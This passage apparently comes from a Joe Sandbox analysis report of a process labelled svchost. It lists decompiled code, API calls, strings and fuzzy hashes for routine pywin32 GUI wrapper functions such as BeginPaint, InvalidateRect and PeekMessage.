                            										__imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z("GlobalLock (for template)", _t41);
                            										return _t38;
                            									}
                            								} else {
                            									return _t33;
                            								}
                            							} else {
                            								_t32 =  *((intOrPtr*)(_t32 + 4));
                            								__eflags =  *(_t32 + 0x54) & 0x01000000;
                            								if(( *(_t32 + 0x54) & 0x01000000) != 0) {
                            									goto L8;
                            								} else {
                            									_t39 = __imp__PyExc_TypeError;
                            									__imp__PyErr_Format( *_t39, "optional param must be None, or an integer (got %s)",  *((intOrPtr*)(_t32 + 0xc)));
                            									return _t39;
                            								}
                            							}
                            						} else {
                            							goto L4;
                            						}
                            					}
                            				} else {
                            					return _t26;
                            				}
                            			}


                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OOOO|O,?,?,?,?,6E294CE8), ref: 6DAA794C
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAA796D
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAA797F
                            Strings
                            • DialogBoxIndirect, xrefs: 6DAA7A70
                            • optional param must be None, or an integer (got %s), xrefs: 6DAA79AF
                            • OOOO|O, xrefs: 6DAA7943
                            • GlobalLock (for template), xrefs: 6DAA79F3
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_U_object@@$Arg_ParseTuple
                            • String ID: DialogBoxIndirect$GlobalLock (for template)$OOOO|O$optional param must be None, or an integer (got %s)
                            • API String ID: 1248562531-206595987
                            • Opcode ID: ce981dc3a2b15f89b760ae70f9bb582e74a0644a461bb87ba0159bb245095a04
                            • Instruction ID: 8f5d7110f793f77ba8bee46b3fac53c9c75e84a6ff0636414b27fe333b2bffed
                            • Opcode Fuzzy Hash: ce981dc3a2b15f89b760ae70f9bb582e74a0644a461bb87ba0159bb245095a04
                            • Instruction Fuzzy Hash: 7641C33590C205AFCB01DF68DC84ABB77B8FF81215F484766F94582122E731DA5B8BA3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:BeginPaint), ref: 6DAB64C7
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB64E3
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB64F2
                            • SetLastError.KERNEL32(00000000), ref: 6DAB64FC
                            • BeginPaint.USER32(?,?), ref: 6DAB650B
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB6514
                            • GetLastError.KERNEL32 ref: 6DAB6521
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(BeginPaint,00000000), ref: 6DAB6531
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: ErrorEval_LastThreadU_object@@$Arg_BeginError@@Object_PaintParseRestoreSaveTupleWin_
                            • String ID: (Nl(iiii)llN)$BeginPaint$O:BeginPaint
                            • API String ID: 984359736-897252672
                            • Opcode ID: a040fa4897dc48a2e08eaf489b611676642ed801340537fdf3790260e4c1fab7
                            • Instruction ID: c12c7a467c1d6516199c5448efeef54d8f40e16eaf705b0c015fb0352fd62575
                            • Opcode Fuzzy Hash: a040fa4897dc48a2e08eaf489b611676642ed801340537fdf3790260e4c1fab7
                            • Instruction Fuzzy Hash: 6331E6759083015FDB006B28CC99B7B3BBDEF81225F4C4624F915C6261E7359D6786A2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OOOO:FindWindowEx,?,?,?,?,?,?), ref: 6DAB01B0
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB01D1
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB01E3
                            • ?PyWinObject_AsResourceIdW@@YAHPAU_object@@PAPA_WH@Z.PYWINTYPES38(?,?,00000001), ref: 6DAB01F7
                            • ?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z.PYWINTYPES38(?,?,00000001,00000000), ref: 6DAB0211
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_U_object@@$Arg_ParseResourceTuple
                            • String ID: FindWindowEx$OOOO:FindWindowEx
                            • API String ID: 3978190805-4095930253
                            • Opcode ID: edeec10ebeed87ff6ec09f99b2e29fcb854b33a6dbb0ed187b99cc14f1c75da3
                            • Instruction ID: f4afef739ada744613ace57100d1f29539dc71b9b6a68c22c8834c16c31303e2
                            • Opcode Fuzzy Hash: edeec10ebeed87ff6ec09f99b2e29fcb854b33a6dbb0ed187b99cc14f1c75da3
                            • Instruction Fuzzy Hash: 1931AE7540C302AFDB009F55CD88BABBBF8FF85306F448929F99491160E771C95A9BA3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyErr_Format.PYTHON38(6E2925BC,%s is not available on this platform,PlgBlt), ref: 6DAAAC9D
                            • PyArg_ParseTuple.PYTHON38(?,OOOiiii|Oii:PlgBlt,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6DAAAD09
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Arg_Err_FormatParseTuple
                            • String ID: %s is not available on this platform$OOOiiii|Oii:PlgBlt$PlgBlt$PlgBlt$Points must contain exactly 3 points.
                            • API String ID: 361908667-1229534533
                            • Opcode ID: 560331ab0d252fb061956d5d211a70d37369d7c535dd02c27a94e554d43706e5
                            • Instruction ID: 372cca1a0ca9bc8ea697274036e5647e887b5b8cfe1625e3c88ba59eb1281634
                            • Opcode Fuzzy Hash: 560331ab0d252fb061956d5d211a70d37369d7c535dd02c27a94e554d43706e5
                            • Instruction Fuzzy Hash: D9412D7250C205AFDB01DB54DC40EABBBF9BF85215F484A2AF98592120E731DA5A8B93
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OiO,?,?), ref: 6DAA712A
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAA7140
                            • ?PyWinLong_AsVoidPtr@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAA715D
                            • PyCallable_Check.PYTHON38 ref: 6DAA7176
                            • PyErr_SetString.PYTHON38(6E28ED8C,object must be callable or a dictionary), ref: 6DAA719E
                            • ?PyWinLong_FromHANDLE@@YAPAU_object@@PAX@Z.PYWINTYPES38(?), ref: 6DAA71B3
                            • GetWindowLongW.USER32(?,000000FC), ref: 6DAA71C4
                            • ?PyWinLong_FromVoidPtr@@YAPAU_object@@PBX@Z.PYWINTYPES38(00000000), ref: 6DAA71CB
                            • Py_BuildValue.PYTHON38(6DABD204,?,00000000), ref: 6DAA71DB
                            • PyDict_SetItem.PYTHON38(00000000,00000000), ref: 6DAA71EB
                            • _Py_Dealloc.PYTHON38(00000000), ref: 6DAA71FA
                            • _Py_Dealloc.PYTHON38(-000000FF), ref: 6DAA7209
                            • SetWindowLongW.USER32 ref: 6DAA7226
                            • ?PyWinLong_FromVoidPtr@@YAPAU_object@@PBX@Z.PYWINTYPES38(00000000), ref: 6DAA722D
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: U_object@@$Long_$FromPtr@@Void$DeallocLongWindow$Arg_BuildCallable_CheckDict_Err_ItemObject_ParseStringTupleValue
                            • String ID: OiO$object must be callable or a dictionary
                            • API String ID: 4001600079-3043360180
                            • Opcode ID: 8f5adfee5e4017ccc96abd8c8a553ee4b7c3ee2076bafe2d8dc3187b80853d5b
                            • Instruction ID: 3a69556c9bf13466d52dce569a9f0a4361ed2136dcc8b330deb1d3536f6c8ce8
                            • Opcode Fuzzy Hash: 8f5adfee5e4017ccc96abd8c8a553ee4b7c3ee2076bafe2d8dc3187b80853d5b
                            • Instruction Fuzzy Hash: 72313EB180C301AFDB019F64DC88A6B7BF9FF41255F488728F866821B1E731D966DB52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyErr_Format.PYTHON38(6E2925BC,%s is not available on this platform,UpdateLayeredWindow), ref: 6DAACDDD
                            • PyArg_ParseTupleAndKeywords.PYTHON38(?,?,O|OOOOOkOk:UpdateLayeredWindow,6DAC7AE4,?,?,?,?,?,00000000,?,?), ref: 6DAACE6A
                            Strings
                            • UpdateLayeredWindow, xrefs: 6DAACF9C
                            • %s is not available on this platform, xrefs: 6DAACDD6
                            • UpdateLayeredWindow, xrefs: 6DAACDD1
                            • O|OOOOOkOk:UpdateLayeredWindow, xrefs: 6DAACE57
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Arg_Err_FormatKeywordsParseTuple
                            • String ID: %s is not available on this platform$O|OOOOOkOk:UpdateLayeredWindow$UpdateLayeredWindow$UpdateLayeredWindow
                            • API String ID: 223827023-43977724
                            • Opcode ID: b071d7bffa05e979d23eecba446171ea9aa2f2f1f5a9d40c925ab1605f759e88
                            • Instruction ID: e36aec6a9467b0540d9c351854976aae56dec8da20ce43c4b81e21e9221e8165
                            • Opcode Fuzzy Hash: b071d7bffa05e979d23eecba446171ea9aa2f2f1f5a9d40c925ab1605f759e88
                            • Instruction Fuzzy Hash: 8351317650C305AFDB00CF64CD80A6BB7F9FB85245F484A2EF955C3210EB32D95A9B62
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PySequence_Check.PYTHON38(?), ref: 6DA91057
                            • PyErr_SetString.PYTHON38(6E28ED8C,Handles must be a list of integers), ref: 6DA91070
                            • PySequence_Size.PYTHON38(?), ref: 6DA91080
                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6DA91090
                            • PyErr_SetString.PYTHON38(6E28EDCC,Allocating array of handles), ref: 6DA910AD
                            Strings
                            • Allocating array of handles, xrefs: 6DA910A6
                            • Handles must be a list of integers, xrefs: 6DA91069
                            • Handles must be a list of integers, xrefs: 6DA9113B
                            Memory Dump Source
                            • Source File: 00000013.00000002.481614905.000000006DA91000.00000020.00020000.sdmp, Offset: 6DA90000, based on PE: true
                            • Associated: 00000013.00000002.481607442.000000006DA90000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481622617.000000006DA94000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481629043.000000006DA96000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481635267.000000006DA98000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6da90000_svchost.jbxd
                            Similarity
                            • API ID: Err_Sequence_String$CheckSizemalloc
                            • String ID: Allocating array of handles$Handles must be a list of integers$Handles must be a list of integers
                            • API String ID: 409462344-2692657032
                            • Opcode ID: 1554a1c2787f9f92bae1eaa1c0be990f0007d71c8928188082afcdf73480dea9
                            • Instruction ID: a39b004dbb299eda72f2436550cf4f7cb8cc8842a70574d724c260c6bc0989d0
                            • Opcode Fuzzy Hash: 1554a1c2787f9f92bae1eaa1c0be990f0007d71c8928188082afcdf73480dea9
                            • Instruction Fuzzy Hash: C5312C7222C3115FCB009F68EC4466A77F4EF4A326B244129F922CA290DF769455875E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:GetRgnBox), ref: 6DAB6187
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB61A3
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB61B2
                            • GetRgnBox.GDI32(?,?), ref: 6DAB61C3
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB61CC
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(GetRgnBox,00000000), ref: 6DAB61DF
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_ThreadU_object@@$Arg_Error@@Object_ParseRestoreSaveTupleWin_
                            • String ID: GetRgnBox$O:GetRgnBox$llll
                            • API String ID: 2386446667-3863442658
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OOi:InvalidateRect,?), ref: 6DAB59D2
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB59E8
                            • PyArg_ParseTuple.PYTHON38(?,llll,?,?,?,?), ref: 6DAB5A23
                            • PyErr_Format.PYTHON38(6E28ED8C,%s: This param must be a tuple of four integers or None,InvalidateRect), ref: 6DAB5A3D
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB5A5C
                            • InvalidateRect.USER32(?,00000000,?), ref: 6DAB5A6D
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB5A76
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(InvalidateRect,00000000), ref: 6DAB5A8B
                            Strings
                            • %s: This param must be a tuple of four integers or None, xrefs: 6DAB5A36
                            • This param must be a tuple of four integers or None, xrefs: 6DAB5AAA
                            • InvalidateRect, xrefs: 6DAB5A86
                            • InvalidateRect, xrefs: 6DAB5A31
                            • OOi:InvalidateRect, xrefs: 6DAB59C9
                            • llll, xrefs: 6DAB5A1D
                            Similarity
                            • API ID: Arg_Eval_ParseThreadTupleU_object@@$Err_Error@@FormatInvalidateObject_RectRestoreSaveWin_
                            • String ID: %s: This param must be a tuple of four integers or None$InvalidateRect$InvalidateRect$OOi:InvalidateRect$This param must be a tuple of four integers or None$llll
                            • API String ID: 1226199816-3145575139
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38 ref: 6DAB58AD
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB58C3
                            • PyArg_ParseTuple.PYTHON38(?,llll,?,?,?,?), ref: 6DAB58FE
                            • PyErr_Format.PYTHON38(6E28ED8C,%s: This param must be a tuple of four integers or None,ValidateRect), ref: 6DAB5918
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB5937
                            • ValidateRect.USER32(?,00000000), ref: 6DAB5944
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB594D
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(ValidateRect,00000000), ref: 6DAB5962
                            Strings
                            • ValidateRect, xrefs: 6DAB595D
                            • %s: This param must be a tuple of four integers or None, xrefs: 6DAB5911
                            • This param must be a tuple of four integers or None, xrefs: 6DAB5981
                            • ValidateRect, xrefs: 6DAB590C
                            • OO:ValidateRect, xrefs: 6DAB589C
                            • llll, xrefs: 6DAB58F8
                            Similarity
                            • API ID: Arg_Eval_ParseThreadTupleU_object@@$Err_Error@@FormatObject_RectRestoreSaveValidateWin_
                            • String ID: %s: This param must be a tuple of four integers or None$OO:ValidateRect$This param must be a tuple of four integers or None$ValidateRect$ValidateRect$llll
                            • API String ID: 1393137343-1491635705
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OOi:GetMenuItemRect,00000000,?), ref: 6DAB315A
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB317B
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB318D
                            Strings
                            Similarity
                            • API ID: Object_U_object@@$Arg_ParseTuple
                            • String ID: OOi:GetMenuItemRect$llll
                            • API String ID: 1248562531-365281674
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OO:ClientToScreen,?), ref: 6DAB25F5
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB2611
                            • ?PyWinObject_AsPOINT@@YAHPAU_object@@PAUtagPOINT@@@Z.PYWINTYPES38(?,?), ref: 6DAB2627
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB2636
                            • ClientToScreen.USER32(?,?), ref: 6DAB2647
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB2650
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(ClientToScreen,00000000), ref: 6DAB2663
                            Strings
                            Similarity
                            • API ID: U_object@@$Eval_Object_Thread$Arg_ClientError@@ParseRestoreSaveScreenT@@@TupleUtagWin_
                            • String ID: ClientToScreen$OO:ClientToScreen
                            • API String ID: 739399495-2882902021
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OO:ScreenToClient,?), ref: 6DAB24C5
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB24E1
                            • ?PyWinObject_AsPOINT@@YAHPAU_object@@PAUtagPOINT@@@Z.PYWINTYPES38(?,?), ref: 6DAB24F7
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB2506
                            • ScreenToClient.USER32 ref: 6DAB2517
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB2520
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(ScreenToClient,00000000), ref: 6DAB2533
                            Strings
                            Similarity
                            • API ID: U_object@@$Eval_Object_Thread$Arg_ClientError@@ParseRestoreSaveScreenT@@@TupleUtagWin_
                            • String ID: OO:ScreenToClient$ScreenToClient
                            • API String ID: 739399495-1442369614
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:GetClientRect), ref: 6DAB0CD7
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB0CF3
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB0D02
                            • GetClientRect.USER32 ref: 6DAB0D13
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB0D1C
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(GetClientRect,00000000), ref: 6DAB0D2F
                            Strings
                            Similarity
                            • API ID: Eval_ThreadU_object@@$Arg_ClientError@@Object_ParseRectRestoreSaveTupleWin_
                            • String ID: GetClientRect$O:GetClientRect$llll
                            • API String ID: 697045670-3788905939
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OOi:ExtractIcon,?,?,?), ref: 6DAB2213
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB222F
                            • ?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z.PYWINTYPES38(?,00000000,00000000,00000000), ref: 6DAB2249
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB2258
                            • SetLastError.KERNEL32(00000000), ref: 6DAB2262
                            • ExtractIconW.SHELL32(?,?,?), ref: 6DAB2274
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB227D
                            • GetLastError.KERNEL32 ref: 6DAB228A
                            • ?PyWinObject_FreeWCHAR@@YAXPA_W@Z.PYWINTYPES38(?), ref: 6DAB229A
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(ExtractIcon,00000000), ref: 6DAB22A6
                            Strings
                            Similarity
                            • API ID: Object_U_object@@$ErrorEval_LastThread$Arg_Error@@ExtractFreeIconParseRestoreSaveTupleWin_
                            • String ID: ExtractIcon$OOi:ExtractIcon
                            • API String ID: 3582158300-1497086784
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38 ref: 6DAB510D
                            • PyArg_ParseTuple.PYTHON38(?,llll,?,?,?,?), ref: 6DAB5147
                            • PyErr_Format.PYTHON38(6E28ED8C,%s: This param must be a tuple of four integers,PtInRect), ref: 6DAB51BD
                            Strings
                            Similarity
                            • API ID: Arg_ParseTuple$Err_Format
                            • String ID: %s: This param must be a tuple of four integers$%s: This param must be a tuple of four integers$OO:PtInRect$PtInRect$PtInRect$llll
                            • API String ID: 1055172171-732539440
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38 ref: 6DAB51FD
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB5216
                            • PyArg_ParseTuple.PYTHON38(?,llll,?,?,?,?), ref: 6DAB524D
                            • PyErr_Format.PYTHON38(6E28ED8C,%s: This param must be a tuple of four integers,RectInRegion), ref: 6DAB52A9
                            Strings
                            Similarity
                            • API ID: Arg_ParseTuple$Err_FormatObject_U_object@@
                            • String ID: %s: This param must be a tuple of four integers$%s: This param must be a tuple of four integers$OO:RectInRegion$RectInRegion$RectInRegion$llll
                            • API String ID: 1273418297-2970479076
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38 ref: 6DAB7110
                            • PyArg_ParseTuple.PYTHON38(?,llll,?,?,?,?), ref: 6DAB714C
                            • PyErr_Format.PYTHON38(6E28ED8C,%s: This param must be a tuple of four integers,CreateEllipticRgnIndirect), ref: 6DAB7166
                            Strings
                            • llll, xrefs: 6DAB7146
                            • %s: This param must be a tuple of four integers, xrefs: 6DAB715A
                            • O:CreateEllipticRgnIndirect, xrefs: 6DAB70FF
                            • CreateEllipticRgnIndirect, xrefs: 6DAB71BC
                            • CreateEllipticRgnIndirect, xrefs: 6DAB7199
                            • %s: This param must be a tuple of four integers, xrefs: 6DAB71C1
                            • CreateEllipticRgnIndirect, xrefs: 6DAB7155
                            Similarity
                            • API ID: Arg_ParseTuple$Err_Format
                            • String ID: %s: This param must be a tuple of four integers$%s: This param must be a tuple of four integers$CreateEllipticRgnIndirect$CreateEllipticRgnIndirect$CreateEllipticRgnIndirect$O:CreateEllipticRgnIndirect$llll
                            • API String ID: 1055172171-2671796847
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,Oiii:PeekMessage,?,?,?), ref: 6DAB19CD
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?,?,?,?,?,?,?), ref: 6DAB19E9
                            • PyEval_SaveThread.PYTHON38(?,?,?,?,?,?,?,?,?,?,?), ref: 6DAB19F9
                            • PeekMessageW.USER32 ref: 6DAB1A16
                            • PyEval_RestoreThread.PYTHON38(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6DAB1A1F
                            • Py_BuildValue.PYTHON38(6DAC02DC,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6DAB1A2B
                            • ?PyWinObject_FromMSG@@YAPAU_object@@PBUtagMSG@@@Z.PYWINTYPES38(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6DAB1A38
                            • _Py_Dealloc.PYTHON38(6E294BE9,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6DAB1A56
                            Strings
                            Similarity
                            • API ID: Eval_Object_ThreadU_object@@$Arg_BuildDeallocFromG@@@MessageParsePeekRestoreSaveTupleUtagValue
                            • String ID: Oiii:PeekMessage
                            • API String ID: 2399918275-502876712
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,Oii:SetWindowOrgEx,?,?,?), ref: 6DAB2A12
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB2A2E
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB2A3D
                            • SetWindowOrgEx.GDI32(?,?,?,?), ref: 6DAB2A56
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB2A5F
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(SetWindowOrgEx,00000000), ref: 6DAB2A72
                            Strings
                            Similarity
                            • API ID: Eval_ThreadU_object@@$Arg_Error@@Object_ParseRestoreSaveTupleWin_Window
                            • String ID: Oii:SetWindowOrgEx$SetWindowOrgEx
                            • API String ID: 1198228836-3175433460
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,Of:SetMiterLimit,?,?), ref: 6DAB6DDD
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB6DF9
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB6E08
                            • SetMiterLimit.GDI32(?,?,?), ref: 6DAB6E25
                            • PyEval_RestoreThread.PYTHON38(00000000,?,?), ref: 6DAB6E2E
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(SetMiterLimit,00000000), ref: 6DAB6E41
                            Strings
                            Similarity
                            • API ID: Eval_ThreadU_object@@$Arg_Error@@LimitMiterObject_ParseRestoreSaveTupleWin_
                            • String ID: Of:SetMiterLimit$SetMiterLimit
                            • API String ID: 1851932747-1262099783
                            • Opcode ID: 323162f7fea57f514c075195bbdb41d462b74208b2c29c027b248a73450c7a75
                            • Instruction ID: e2e208890efa16728355c31f86b81fbb2991128e3a65c2465435d1f3feea7926
                            • Opcode Fuzzy Hash: 323162f7fea57f514c075195bbdb41d462b74208b2c29c027b248a73450c7a75
                            • Instruction Fuzzy Hash: B531287690C3019FDB00AF29CC84A7B7BBDFF81215F484725F84882261F731985B8BA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,Oii:SetViewportOrgEx,?,?,?), ref: 6DAB2C42
